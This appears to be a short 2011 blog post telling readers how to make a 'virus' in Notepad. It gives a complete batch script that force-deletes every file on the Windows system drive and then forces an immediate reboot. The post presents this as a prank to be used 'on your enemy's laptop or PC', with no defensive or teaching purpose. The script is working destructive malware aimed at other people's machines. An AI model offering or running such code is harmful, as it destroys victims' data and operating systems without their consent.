Wednesday, September 28, 2011

Create Virus Which Crashes Windows within Few Seconds Using Notepad

This is a very simple virus program to delete all the contents of the C drive and completely deletes the windows operating system.

Open Notepad and Enter the following code
 
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save the above code with  .bat extension.

Caution: If you open the .bat file it will delete ur systemdrive. so be careful If Any lose of ur data i am not responsible for that. You should carefully use it. Use it only on your enemy's laptop or PC.

No comments:

Post a Comment